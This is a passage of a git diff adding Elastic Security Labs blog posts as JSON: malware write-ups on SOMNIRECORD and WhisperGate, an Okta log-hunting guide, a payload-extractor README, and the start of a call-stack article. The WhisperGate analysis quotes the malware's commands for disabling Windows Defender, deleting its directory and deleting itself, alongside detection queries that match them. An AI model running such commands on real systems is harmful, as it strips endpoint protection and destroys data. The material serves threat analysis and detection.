[here](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SomniRecord.yar).\n\n### Sources\n\nCode similarity analyses play an important role in discovering the sources of malicious code used by adversaries. In an effort to identify the source of SOMNIRECORD, we identified an open source project called [DNS-Persist](https://github.com/chouaibhm/DNS-Persist/) that contained similar logic. Like NAPLISTENER, we believe the attacker was inspired by this project and then added modifications to facilitate success in a specific target environment.\n\n### Key takeaways\n\n- The use of open source projects by the attacker indicates that they are taking steps to customize existing tools for their specific needs and may be attempting to counter attribution attempts\n- SOMNIRECORD uses DNS to pattern communication with its command and control (C2), which enables attackers to bypass network egress controls and monitoring\n"
+ },
+ "title": "Not sleeping anymore: SOMNIRECORD's wake-up call",
+ "slug": "not-sleeping-anymore-somnirecords-wakeup-call",
+ "date": "2023-03-22",
+ "description": "Elastic Security Labs researchers identified a new malware family written in C++ that we refer to as SOMNIRECORD. This malware functions as a backdoor and communicates with command and control (C2) while masquerading as DNS.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "blog-thumb-steel-engine.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "malware analysis",
+ "somnirecord",
+ "siestagraph",
+ "naplistener"
+ ]
+ },
+ "id": "security_labs_content-not_sleeping_anymore_somnirecords_wakeup_call-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-okta_and_lapsus_what_you_need_to_know-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-okta_and_lapsus_what_you_need_to_know-md.json
new file mode 100644
index 00000000000..6751253080a
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-okta_and_lapsus_what_you_need_to_know-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Okta and LAPSUS$: What you need to know\"\nslug: \"okta-and-lapsus-what-you-need-to-know\"\ndate: \"2022-06-02\"\ndescription: \"The latest organization under the microscope of the LAPSUS$ group is Okta. Threat hunt for the recent breach targeting Okta users using these simple steps in Elastic\"\nauthor:\n - slug: jake-king\nimage: \"blog-security-detection-720x420.png\"\ncategory:\n - slug: activity-group\n---\n\n> Readers Note:\n>\n> Elastic has undergone a series of investigations internally and has not yet identified malicious actions that may pertain to this event. Okta has also released two statements relating to the incident in question that may be reviewed [here](https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/) and [here](https://www.okta.com/blog/2022/03/okta-official-statement-on-lapsus-claims/).\n\n## The LAPSUS$ group\n\nFinancially motivated adversary groups executing ransomware attacks have rightfully gotten our attention in recent years. Similar to Lulzec, there’s a new group catching attention with different motivations, targeting larger organizations.\n\nThe LAPSUS$ group emerged onto the scene a number of months ago, targeting high-profile organizations such as Nvidia, Samsung, and Ubisoft — making various demands that in some cases, resulted in either data dumps or screenshots of internal systems shared via the group’s Telegram account. These were sometimes determined by user-voted polls within the group, suggesting that this is only the beginning of a series of attacks the group is undertaking more frequently as they gain press coverage.\n\nGroups of this nature focus on data theft and extortion via means of social engineering — commonly, targeted spear phishing campaigns.\n\nThe latest organization under the microscope of the LAPSUS$ group is Okta, the identity provider for thousands of companies of all sizes. Surprisingly, LAPSUS$ chose to note in their release of information that their targeting of Okta was not for access to Okta’s systems, but rather that of their customers:\n\n\n\n## The latest target: Okta\n\nAfter LAPSUS$ sent a notification last night to the Telegram account, Okta’s CEO responded with a series of Tweets and an [official statement](https://sec.okta.com/articles/2022/03/official-okta-statement-lapsus-claims) regarding the suspected compromise, stating that it occurred in January 2022, similar to dates visible in the screenshots from Telegram post:\n\n\n\n\n\n\n\n\n\n\n\nWhile the initial notice provided some insights into potential scope and timing of the incident, many customers are still interested in identifying the scope of the access, and how to assess if there is any local impact within their organization.\n\nThe updated notice released by Okta suggested that access was limited to a specific end-user system with no ability to create or delete users or download customer information. However, it did have the ability to reset passwords and MFA tokens for users, while not obtaining access to them. Responses from LAPSUS$ are included for context, and suggest more may need to be investigated.\n\nIn the third update notification shared by David Bradbury at Okta, a correction was made indicating that a small (2.5% of customer base) were potentially impacted by the incident. Further details will be shared via a Webinar scheduled at 8AM, PDT Wednesday, March 23rd.. A link to sign up for the webinar is located within the [aforementioned update post.](https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/)\n\nAs more information pertaining to the breach is released by either LAPSUS$ or Okta, we will maintain the accuracy of information shared within this post.\n\n## Threat hunting Okta logs in Elastic\n\nThe good news is that customers of Okta do have access to relatively comprehensive log information regarding activity within their account. Okta has configured a default 90 day retention window for system events. Okta [released an updated statement](https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/) stating customers do not have to respond to the incident immediately, but for those wishing to investigate further, the following threat hunting information is still valuable.\n\nThe process to get started with ingesting Okta logs is simple — a prebuilt integration for Okta Log ingestion is available as a one-click module configurable within Kibana:\n\n\n\nAlternatively, the [Okta Filebeat Module](https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-okta.html#filebeat-module-okta) can easily be added to Elastic to provide insights into previous account activity.\n\nConfiguring the Okta Module is simple, providing you tweak the initial_interval value to 90 days:\n\n```\n~ ~ ~\n- module: okta\n system:\n var.url: https://yourOktaDomain/api/v1/logs\n var.api_key: XXXX-XXXX...XXXX-XXXX'\n var.initial_interval: 90d # will fetch events starting 90 days ago.\n~ ~ ~\n```\n\n\n\nOnce events are ingested, a number of Lucene queries are easily leveraged for early/initial signs of compromise. While these events are not a comprehensive set of queries, they should provide ample detail for any security team to investigate potential suspicious activity:\n\nMFA device reset via console for any user:\n\n###### event.module:\"okta\" AND event.action:\"user.mfa.factor.reset_all\"\n\nUser Account email update records updated to a new value:\n\n###### event.module:\"okta\" AND event.action:\"user.account.update_primary_email\"\n\nUser Privilege granted for an account within your Okta organization:\n\n###### event.module:\"okta\" AND event.action:\"user.account.privilege.grant\"\n\nOkta Administrative staff have a series of privileges that allow for user-impersonation via their management service. Logs pertaining to this action should be inspected:\n\n###### event.module:okta AND (event.action:user.session.impersonation.grant OR event.action:user.session.impersonation.initiate)\n\nThere are many other ways to look for suspicious activity in your Okta data. In addition to these queries, Elastic provides a large set of prebuilt detections for suspicious Okta activity used by other adversarial groups in our [open detection-rules repo](https://github.com/elastic/detection-rules/tree/main/rules/integrations/okta). This will be useful in generating alerts as Okta logs are coming into Elastic. You can use the query logic in those rules to drive other hunts beyond the four we mention above as well.\n\n\n\n> _Not familiar with what suspicious Okta data looks like?_\n>\n> _Read the_ [blog](https://www.elastic.co/blog/testing-okta-visibility-and-detection-dorothy) _from December 2020 where we discussed the subject and released an open adversary simulation tool called_ [Dorothy](https://github.com/elastic/dorothy) _to help security teams test_ _visibility, monitoring, and detection capabilities for Okta logs._\n>\n> _We expect many security teams will give SSO logs extra attention in light of this incident, and this tool may help teams get up to speed on the subject._\n\n## Earlier events: Microsoft, Nvidia, Samsung, Ubisoft\n\nAs previously stated, the LAPSUS$ group has been on a serious compromise train over the past few months, targeting a number of high-profile targets. Numerous details have been shared across a number of different media outlets, and a common theme of social engineering and internal access has been observed across many of the attacks:\n\n- [37GB of Source Code was leaked from Microsoft](https://www.bleepingcomputer.com/news/microsoft/lapsus-hackers-leak-37gb-of-microsofts-alleged-source-code/) in an earlier dump identified this week\n- [Ubisoft ](https://www.zdnet.com/article/ubisoft-reveals-security-incident-forcing-company-wide-password-refresh/#ftag=RSSbaffb68)- Company-wide password reset after unusual activity identified on systems located\n- [Nvidia issues](https://www.zdnet.com/article/ubisoft-reveals-security-incident-forcing-company-wide-password-refresh/#ftag=RSSbaffb68) notice after internal systems indicate data compromise\n- [Samsung confirms source-code](https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code) compromise via the LAPSUS$ group\n\nAs further information is uncovered, and mechanisms for detection improve, Elastic Security will continue to provide further updates to this and provide subsequent posts relating to detections.\n\nIf you haven’t checked out the Elastic Security solution, take a look at our [Quick Start guides](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). You can always get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration). Or [download](https://www.elastic.co/downloads/) the self-managed version of the Elastic Stack for free.\n"
+ },
+ "title": "Okta and LAPSUS$: What you need to know",
+ "slug": "okta-and-lapsus-what-you-need-to-know",
+ "date": "2022-06-02",
+ "description": "The latest organization under the microscope of the LAPSUS$ group is Okta. Threat hunt for the recent breach targeting Okta users using these simple steps in Elastic",
+ "author": [
+ {
+ "slug": "jake-king"
+ }
+ ],
+ "image": "blog-security-detection-720x420.png",
+ "category": [
+ {
+ "slug": "activity-group"
+ }
+ ]
+ },
+ "id": "security_labs_content-okta_and_lapsus_what_you_need_to_know-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-operation_bleeding_bear-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-operation_bleeding_bear-md.json
new file mode 100644
index 00000000000..bce62465b4e
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-operation_bleeding_bear-md.json
@@ -0,0 +1,42 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Operation Bleeding Bear\"\nslug: \"operation-bleeding-bear\"\ndate: \"2022-12-06\"\ndescription: \"Elastic Security verifies new destructive malware targeting Ukraine: Operation Bleeding Bear\"\nauthor:\n - slug: daniel-stepanic\n - slug: james-spiteri\n - slug: joe-desimone\n - slug: mark-mager\n - slug: andrew-pease\nimage: \"bleeding-bear.jpg\"\ncategory:\n - slug: campaigns\ntags:\n - bleeding bear\n - destructive\n - ransomware\n - malware\n---\n\n## Key Takeaways\n\n- Elastic Security provides new analysis and insights into targeted campaign against Ukraine organizations with destructive malware reported over the weekend of Jan 15, 2022\n- Techniques observed include process hollowing, tampering with Windows Defender, using a Master Boot Record (MBR) wiper, and file corruptor component\n- Elastic Security prevents each stage of the described campaign using prebuilt endpoint protection features\n\n\n\n## Overview\n\nOver this past weekend (1/15/2022), Microsoft released details of a new [campaign targeting Ukrainian government entities](https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/) and organizations with destructive malware. In a multi-staged attack, one malware component known as WhisperGate utilizes a wiping capability on the Master Boot Record (MBR), making any machine impacted inoperable after boot-up.\n\nWithin another stage, a file infector component is used to corrupt files in specific directories with specific file extensions. The elements used in this campaign lack the common characteristics of a ransomware compromise – in this case the adversary uses the same Bitcoin address for each victim and offers no sign of intent to decrypt the victim’s machine.\n\nThe Ukrainian National Cyber Security Coordination Center has been referring to this threat activity on its official [Twitter](https://twitter.com/ncsccUA/status/1482733473228013569?s=20) and [Facebook](https://www.facebook.com/ncsccUA/posts/449966023412420) accounts as Operation Bleeding Bear.\n\n\n\n**Elastic users are fully protected** from attacks like these through our advanced malware detection and Ransomware Protection capabilities in the platform. The Elastic Security team continues to monitor these events. This case highlights the importance of prevention when it’s up against ransomware and malware with destructive capabilities.\n\n### Stage 1: WhisperGate MBR payload\n\nThe Master Boot Record (MBR) is software that executes stored start-up information and, most importantly, informs the system of the location of the bootable partition on disk that contains the user’s operating system. If tampered with, this can result in the system being inoperable – a common tactic for malware and ransomware campaigns over the years to interrupt operation of the infected system.\n\nThe stage 1 binary is named stage1.exe and has low complexity. A 8192 byte buffer containing the new MBR data that includes the ransom note is allocated on the stack. A file handle is retrieved from **CreateFileW** pointing to the first physical drive which represents the MBR. That file handle is then called by **WriteFile** which takes only 512 bytes from the buffer writing over the Master Boot Record.\n\n## Malware analysis breakdown (Stages 1-4)\n\n\n\nThe host is subsequently rendered inoperable during the next boot-up sequence. Below is a screenshot showing the ransom note from an affected virtual machine.\n\n\n\nContained within the ransom note are instructions soliciting payment to a bitcoin wallet address of [1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv](https://www.blockchain.com/btc/address/1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv). The wallet does not appear to have received funds from victims as of the publication of this post.\n\n\n\n### Stage 2/3: Discord downloader and injector\n\nOnce the payload has gained a foothold, further destructive capabilities are facilitated by the stage 2 binary, called stage2.exe. This binary pulls down and launches a payload hosted via the Discord content delivery network, a [recently](https://www.riskiq.com/blog/external-threat-management/discord-cdn-abuse-malware/) [reported](https://www.zscaler.com/blogs/security-research/discord-cdn-popular-choice-hosting-malicious-payloads) approach which is increasingly being used by malicious actors.\n\n\n\nThe obfuscated .NET payload (described as Stage 3 below) is then executed in memory, setting off a number of events including:\n\n- Writing and executing a VBS script that uses PowerShell to add a Windows Defender exclusion on the root directory (C:)\n\n```\nWriting and executing a VBS script\n\n\"C:\\Windows\\System32\\WScript.exe\"\"C:\\Users\\jim\\AppData\\Local\\Temp\\Nmddfrqqrbyjeygggda.vbs\"\n\n```\n\n```\nUses PowerShell to add a Windows Defender exclusion\n\npowershell.exe Set-MpPreference -ExclusionPath 'C:\\'\n```\n\n[AdvancedRun](https://www.nirsoft.net/utils/advanced_run.html), a program used to run Windows applications with different settings, is then dropped to disk and executed in order to launch the Service Control Manager and stop the Windows Defender service (WinDefend).\n\n```\nAdvancedRun is used to stop Windows Defender\n\n\"C:\\Users\\jim\\AppData\\Local\\Temp\\AdvancedRun.exe\" /EXEFilename \"C:\\Windows\\System32\\sc.exe\" `\n /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run\n\n```\n\nAdvancedRun is used again when launching PowerShell to recursively delete the Windows Defender directory and its files.\n\n```\nAdvancedRun deleting the Windows Defender directory\n\n\"C:\\Users\\jim\\AppData\\Local\\Temp\\AdvancedRun.exe\" `\n /EXEFilename \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" /WindowState 0 `\n /CommandLine \"rmdir 'C:\\ProgramData\\Microsoft\\Windows Defender' -Recurse\" `\n /StartDirectory \"\" /RunAs 8 /Run\n```\n\nCopies InstallUtil.exe is a command-line utility that allows users to install and uninstall server resources from the local machine into the user’s %TEMP% directory. This action leverages the file for [process hollowing](https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process) by launching it in a suspended state.\n\n\n\nIt then proceeds to allocate memory (VirtualAllocEx , write the file corruptor payload (described as the Final Stage below) into memory (WriteProcessMemory), modify the thread entry point (SetThreadContext) to point to the file corruptor entry point, and start execution of the file corruptor (ResumeThread).\n\n\n\n### Final stage: File corruptor\n\nThe final file corruptor payload is loaded in memory via process hollowing to the InstallUtil process. The file corruptor:\n\n- Targets any local hard drives, attached USB drives, or mounted network shares\n- Scans directories for files matching internal hard-coded extension list (excluding the Windows folder)\n\n```\n.3DM .3DS .602 .7Z .ACCDB .AI .ARC .ASC .ASM .ASP .ASPX .BACKUP .BAK .BAT .BMP .BRD\n.BZ .BZ2 .C .CGM .CLASS .CMD .CONFIG .CPP .CRT .CS .CSR .CSV .DB .DBF .DCH .DER .DIF\n.DIP .DJVU.SH .DOC .DOCB .DOCM .DOCX .DOT .DOTM .DOTX .DWG .EDB .EML .FRM .GIF .GO\n.GZ .H .HDD .HTM .HTML .HWP .IBD .INC .INI .ISO .JAR .JAVA .JPEG .JPG .JS .JSP .KDBX\n.KEY .LAY .LAY6 .LDF .LOG .MAX .MDB .MDF .MML .MSG .MYD .MYI .NEF .NVRAM .ODB .ODG .ODP\n.ODS .ODT .OGG .ONETOC2 .OST .OTG .OTP .OTS .OTT .P12 .PAQ .PAS .PDF .PEM .PFX .PHP .PHP3\n.PHP4 .PHP5 .PHP6 .PHP7 .PHPS .PHTML .PL .PNG .POT .POTM .POTX .PPAM .PPK .PPS .PPSM .PPSX\n.PPT .PPTM .PPTX .PS1 .PSD .PST .PY .RAR .RAW .RB .RTF .SAV .SCH .SHTML .SLDM .SLDX .SLK\n.SLN .SNT .SQ3 .SQL .SQLITE3 .SQLITEDB .STC .STD .STI .STW .SUO .SVG .SXC .SXD .SXI .SXM\n.SXW .TAR .TBK .TGZ .TIF .TIFF .TXT .UOP .UOT .VB .VBS .VCD .VDI .VHD .VMDK .VMEM .VMSD\n.VMSN .VMSS .VMTM .VMTX .VMX .VMXF .VSD .VSDX .VSWP .WAR .WB2 .WK1 .WKS .XHTML .XLC .XLM\n.XLS .XLSB .XLSM .XLSX .XLT .XLTM .XLTX .XLW .YML .ZIP\n\n```\n\n- Overwrites the start of each targeted file with 1MB of static data (byte 0xCC), regardless of file size\n- Renames each targeted file to a randomized extension\n- Deletes self with the command:\n\n```\nOverwriting, renaming, and deleting files\n\ncmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q \n\n```\n\n\n\n## MBR protection with Elastic Security\n\nChanges to the MBR are particularly strong signals of anomalous and destructive activity typically associated with ransomware. To counteract this, Elastic security researchers built an MBR protection component based around these signals into our multi-layered ransomware protection feature.\n\nWhen a process attempts to overwrite the contents of the MBR, the prewrite buffer and other associated process metadata will be analyzed inline before any changes are written to disk. If the activity is deemed malicious in nature, the process will either be terminated immediately (prevention mode) and / or an appropriate ransomware alert will be generated (prevention and detection modes) to allow security operators time to respond.\n\nWhen configured in prevention mode, Elastic Security’s ransomware protection ensures that the integrity of the MBR is fully preserved, with no changes ever reaching disk thanks to the synchronous framework leveraged by the feature — effectively preventing the ransomware attack in their tracks as the offending process is terminated.\n\nWhen WriteFile is invoked on PhysicalDrive0 on a host running Elastic Security with ransomware protection enabled, the pending change will immediately be analyzed and deemed malicious. Afterwards, the process will be terminated, the endpoint user will be alerted via a popup notification, and a ransomware prevention alert will be sent to and stored in Elasticsearch. The intended ransom note can be easily deciphered after Base64 decoding the contents of the prewrite buffer found in the alert within Kibana.\n\n\n\nIt is important to note that while this behaviour is detected by Elastic, it is not specific to this payload and rather the behaviour the payload is exhibiting. This increases our chance of being able to detect and prevent malicious behaviors, even when a static signature of the malware is not known. Threat actors find this kind of control more difficult to evade than traditional, signature-based detection and prevention approaches.\n\n## Observing WhisperGate in Elastic Security\n\nBy observing the process hash of the stage 1 dropper above (a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92) via the process.hash function within Elastic Security, we can isolate the ransomware alert and analyze the blocked attempt at overwriting the MBR.\n\n\n\n\n\nAs we can see, the data is stored as a Base64 encoded string in Elasticsearch. Decoded, we can see the contents of the ransom note that would be displayed to the end user of an affected system.\n\n\n\n## Alert breakdown and defensive recommendations\n\nThe following alerts were triggered in Elastic Security during our investigations:\n\n### Endpoint Security Integration Alerts\n\n#### Stage 1 - MBR Wiper\n\n(a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92)\n\n- Malware Prevention Alert\n- Ransomware Prevention Alert (MBR overwrite)\n\n#### Stage 2 - Downloader\n\n(dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78)\n\n- Malware Prevention Alert\n\n#### Stage 3 + Stage 4 - Injector/File Corruptor\n\n(34CA75A8C190F20B8A7596AFEB255F2228CB2467BD210B2637965B61AC7EA907)\n\n- Ransomware Prevention Alert (canary files)\n- Malicious Behaviour Prevention Alert - Binary Masquerading via Untrusted Path\n- Memory Threat Prevention Alert\n\n### Prebuilt Detection Engine Alerts\n\nThe following existing [public detection rules](https://github.com/elastic/detection-rules) can also be used to detect some of the employed techniques:\n\n- [Suspicious Execution via Windows Management Instrumentation (WMI)](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_suspicious_cmd_wmi.toml)\n- [Windows Defender Exclusions Added via PowerShell](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml)\n- [Connection to Commonly Abused Web Services](https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_common_webservices.toml)\n- [Process Execution from an Unusual Directory](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_from_unusual_directory.toml)\n- [Windows Script Executing PowerShell](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/initial_access_script_executing_powershell.toml)\n- [Disabling Windows Defender Security Settings via PowerShell](https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml)\n\n### Hunting queries\n\nDetect attempt to tamper with Windows defender settings via [NirSoft AdvancedRun](https://www.nirsoft.net/utils/advanced_run.html) executed by [the Stage 3 injector](https://www.virustotal.com/gui/file/923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6/community):\n\n```\nDetect attempts to tamper with Windows Defender\n\nprocess where event.type == \"start\" and\nprocess.pe.original_file_name == \"AdvancedRun.exe\" and\nprocess.command_line :\n (\"*rmdir*Windows Defender*Recurse*\",\n \"*stop WinDefend*\")\n```\n\nMasquerade as InstallUtil via code injection:\n\n```\nIdentifies code injection with InstallUtil\n\nprocess where event.type == \"start\" and\nprocess.pe.original_file_name == \"InstallUtil.exe\" and\nnot process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*\"\n```\n\n## MITRE ATT&CK\n\n- [T1561.002 - Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002/)\n- [T1562.001 - Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001/)\n- [T1047 - Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/)\n- [T1102 - Web Service](https://attack.mitre.org/techniques/T1102/)\n- [T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/)\n- [T1027 - Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)\n\n## Summary\n\nThese targeted attacks on Ukraine using destructive malware match a similar pattern observed in the past such as [NotPetya](https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/). By leveraging different malware components to wipe machines and corrupt files, it’s apparent there was no intent to recover any funds, but likely a technique used to sow chaos and doubt into Ukraine’s stability.\n\nAs these events are still ongoing, we wanted to release some initial analysis and observations from our perspective. We also wanted to highlight the prevention capabilities of Elastic Security across each stage of this attack, available to everyone today.\n\nExisting Elastic Security users can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). You can always get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?elektra=whats-new-elastic-security-7-16-blog).\n\n## Indicators\n\n| Indicator | Type | Note |\n| ---------------------------------------------------------------- | ------ | ---------------------------- |\n| a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 | SHA256 | Stage1.exe (MBR wiper) |\n| dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 | SHA256 | Stage2.exe (Downloader) |\n| 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 | SHA256 | Stage3 (Injector - original) |\n| 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d | SHA256 | Stage3 (Injector - fixed) |\n| 34CA75A8C190F20B8A7596AFEB255F2228CB2467BD210B2637965B61AC7EA907 | SHA256 | Stage4 (File Corruptor) |\n\n## Artifacts\n\nArtifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc57bd32cdaea24f7/628e88d8b385dc5352428ffc/bleeding-bear-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "Operation Bleeding Bear",
+ "slug": "operation-bleeding-bear",
+ "date": "2022-12-06",
+ "description": "Elastic Security verifies new destructive malware targeting Ukraine: Operation Bleeding Bear",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "james-spiteri"
+ },
+ {
+ "slug": "joe-desimone"
+ },
+ {
+ "slug": "mark-mager"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "bleeding-bear.jpg",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "bleeding bear",
+ "destructive",
+ "ransomware",
+ "malware"
+ ]
+ },
+ "id": "security_labs_content-operation_bleeding_bear-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-parallax_payload_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-parallax_payload_extractor-md.json
new file mode 100644
index 00000000000..2260e401367
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-parallax_payload_extractor-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"PARALLAX Payload Extractor\"\nslug: \"parallax-payload-extractor\"\ndate: \"2022-12-06\"\ndescription: \"Python script to extract the payload from PARALLAX samples.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - parallax\n - ref2731\n---\n\nPython script to extract the payload from PARALLAX samples.\n\n[Download parallax-payload-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdcec03c5c91923f5/633613d524bebb2394c2773d/parallax-payload-extractor.tar.gz)\n\n> For information on the PARALLAX malware loader and campaign observations, check out our [blog posts](https://elastic.co/security-labs/exploring-the-ref2731-intrusion-set) detailing this intrusion set.\n\n## Getting started\n\n### Docker\n\nThe recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.\n\n```\ndocker build . -t parallax_loader_payload_extractor\n```\n\nThen we run the container with the -v flag to map a host directory to the docker container directory.\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data parallax_loader_payload_extractor:latest --help\n```\n\n### Running it locally\n\nAs mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nparallax_loader_payload_extractor --help\n```\n\n## Usage\n\nWe can either specify a single sample with **-f** option or a directory of samples with **-d**. You can use the -o switch to set the output directory of the payloads.\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data parallax_loader_payload_extractor:latest -d /data -o /data\n```\n\n\n\nYou can collect the extracted payloads from the directory you set when running the extractor, the data directory in the root of the extractor in the above example.\n"
+ },
+ "title": "PARALLAX Payload Extractor",
+ "slug": "parallax-payload-extractor",
+ "date": "2022-12-06",
+ "description": "Python script to extract the payload from PARALLAX samples.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "parallax",
+ "ref2731"
+ ]
+ },
+ "id": "security_labs_content-parallax_payload_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-peeling_back_the_curtain_with_call_stacks-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-peeling_back_the_curtain_with_call_stacks-md.json
new file mode 100644
index 00000000000..ef90891446f
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-peeling_back_the_curtain_with_call_stacks-md.json
@@ -0,0 +1,35 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Peeling back the curtain with call stacks\"\nslug: \"peeling-back-the-curtain-with-call-stacks\"\ndate: \"2023-09-13\"\ndescription: \"In this article, we'll show you how we contextualize rules and events, and how you can leverage call stacks to better understand any alerts you encounter in your environment.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"photo-edited-10@2x.jpg\"\ncategory:\n - slug: security-operations\n - slug: security-research\n - slug: detection-science\ntags:\n - detection engineering\n - threat hunting\n - threat detection\n---\n\n## Introduction\nElastic Defend provides over [550 rules](https://github.com/elastic/protections-artifacts/tree/main/behavior/rules) (and counting) to detect and stop malicious behavior in real time on endpoints. We recently [added kernel call stack enrichments](https://www.elastic.co/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks) to provide additional context to events and alerts. Call stacks are a win-win-win for behavioral protections, simultaneously improving false positives, false negatives, and alert explainability. In this article, we'll show you how we achieve all three of these, and how you can leverage call stacks to better understand any alerts you encounter in your environment.\n\n## What is a call stack?\nWhen a thread running function A calls function B, the CPU automatically saves the current instruction’s address (within A) to a thread-specific region of memory called the stack. This saved pointer is known as the return address - it's where execution will resume once the B has finished its job. If B were to call a third function C, then a return address within B will also be saved to the stack. These return addresses can be retrieved through a process known as a [stack walk](https://learn.microsoft.com/en-us/windows/win32/debug/capturestackbacktrace), which reconstructs the sequence of function calls that led to the current thread state. Stack walks list return addresses in reverse-chronological order, so the most recent function is always at the top.\n\nIn Windows, when we double-click on **notepad.exe**, for example, the following series of functions are called: \n\n - The green section is related to base thread initialization performed by the operating system and is usually identical across all operations (file, registry, process, library, etc.)\n - The red section is the user code; it is often composed of multiple modules and provides approximate details of how the process creation operation was reached\n - The blue section is the Win32 and Native API layer; this is operation-specific, including the last 2 to 3 intermediary Windows modules before forwarding the operation details for effective execution in kernel mode\n\nThe following screenshot depicts the call stack for this execution chain:\n\n\n\nHere is an example of file creation using **notepad.exe** where we can see a similar pattern: \n\n - The blue part lists the last user mode intermediary Windows APIs before forwarding the create file operation to kernel mode drivers for effective execution\n - The red section includes functions from **user32.dll** and **notepad.exe**, which indicate that this file operation was likely initiated via GUI\n - The green part represents the initial thread initialization\n \n \n\n## Events Explainability\n\nApart from using call stacks for finding known bad, like [unbacked memory regions](https://www.elastic.co/security-labs/hunting-memory) with RWX permissions that may be the remnants of prior code injection. Call stacks provide very low-level visibility that often reveals greater insights than logs can otherwise provide. \n\nAs an example, 